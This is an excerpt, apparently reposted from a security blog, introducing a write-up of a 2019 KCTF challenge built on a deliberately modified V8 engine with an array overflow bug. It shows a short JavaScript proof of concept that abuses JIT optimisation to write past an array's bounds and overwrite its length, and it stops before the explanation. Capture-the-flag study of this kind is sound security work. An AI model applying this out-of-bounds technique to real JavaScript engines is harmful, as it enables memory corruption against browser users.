Read the original article: V8 Array Overflow Exploitation: 2019 KCTF Problem 5
Introduction to the KCTF Problem
Problem 5 – 小虎还乡 of the 2019 KCTF Competition provides us with a vulnerable v8. The v8 has an array overflow vulnerability. But this is not a native v8 vulnerability. Instead, the authors modified some v8 files and created this vulnerability manually. This post shows you step-by-step on how to exploit this vulnerability.
PoC of the V8 Array Overflow Vulnerability
0 var buggy; 1 var overwrite_length = () => { 2 let oob = new Date(-864000000 * 15000000); 3 oob = Math.abs(oob.getDate() - 16) >> 5; 4 buggy = [1.1]; 5 buggy[oob * 4] = 1.1; 6 }; 7 for (let i = 0; i < 0x10000; i++) overwrite_length();
The PoC code triggers the array overflow bug. The following explains how the PoC works.
Read the original article: V8 Array Overflow Exploitation: 2019 KCTF Problem 5